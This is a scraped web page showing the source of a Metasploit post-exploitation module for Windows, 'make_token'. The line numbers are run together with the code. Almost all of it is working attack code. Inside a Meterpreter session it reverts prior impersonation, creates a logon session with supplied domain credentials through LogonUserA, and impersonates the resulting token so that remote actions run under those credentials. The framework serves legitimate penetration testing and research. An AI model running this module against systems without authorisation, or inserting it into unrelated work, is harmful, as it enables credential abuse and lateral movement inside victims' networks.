Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/make_token.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Make Token Command',12'Description' => %q{13In its default configuration, this module creates a new network security context with the specified14logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and15a new logon session is created and linked to that token. The token is then impersonated to acquire16the new network security context. This module has no effect on local actions - only on remote ones17(where the specified credential material will be used). This module does not validate the credentials18specified.19},20'License' => MSF_LICENSE,21'Notes' => {22'AKA' => ['make_token', 'maketoken'],23'Stability' => [CRASH_SAFE],24'Reliability' => [REPEATABLE_SESSION],25'SideEffects' => [IOC_IN_LOGS]26},27'Platform' => ['win'],28'SessionTypes' => ['meterpreter'],29'Author' => [30'Daniel López Jiménez (attl4s)',31'Simone Salucci (saim1z)'32],33'Compat' => {34'Meterpreter' => {35'Commands' => %w[36stdapi_railgun_api37stdapi_sys_config_revert_to_self38stdapi_sys_config_update_token39]40}41}42)43)4445register_options(46[47OptString.new('DOMAIN', [true, 'Domain to use' ]),48OptString.new('USERNAME', [true, 'Username to use' ]),49OptString.new('PASSWORD', [true, 'Password to use' ])50]51)5253register_advanced_options(54[55OptEnum.new('LOGONTYPE', [true, 'The type of logon operation to perform. Using LOGON32_LOGON_INTERACTIVE may cause issues within the session (typically due to the token filtering done by the UserAccountControl mechanism in Windows). Use with caution', 'LOGON32_LOGON_NEW_CREDENTIALS', ['LOGON32_LOGON_BATCH', 'LOGON32_LOGON_INTERACTIVE', 'LOGON32_LOGON_NETWORK', 'LOGON32_LOGON_NETWORK_CLEARTEXT', 'LOGON32_LOGON_NEW_CREDENTIALS', 'LOGON32_LOGON_SERVICE', 'LOGON32_LOGON_UNLOCK']]),56]57)58end5960def run61# Make sure we meet the requirements before running the script62fail_with(Failure::BadConfig, 'This module requires a Meterpreter session') unless session.type == 'meterpreter'6364# check/set vars65user = datastore['USERNAME']66password = datastore['PASSWORD']67domain = datastore['DOMAIN']68logontype = datastore['LOGONTYPE']6970# revert any existing impersonation before doing a new one71print_status('Executing rev2self to revert any previous token impersonations')72session.sys.config.revert_to_self7374# create new logon session / token pair75print_status("Executing LogonUserA with the flag #{logontype} to create a new security context for #{domain}\\#{user}")76logon_user = session.railgun.advapi32.LogonUserA(user, domain, password, logontype, 'LOGON32_PROVIDER_DEFAULT', 4)7778if logon_user['return']79# get the token handle80ph_token = logon_user['phToken']81print_status('Impersonating the new security context...')8283# store the token within the server84session.sys.config.update_token(ph_token)85print_good('The session should now run with the new security context!')8687# send warning88if logontype == 'LOGON32_LOGON_NEW_CREDENTIALS'89print_warning('Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)')90end91else92print_error("LogonUserA call failed, Error Code: #{logon_user['GetLastError']} - #{logon_user['ErrorMessage']}")93end94end95end969798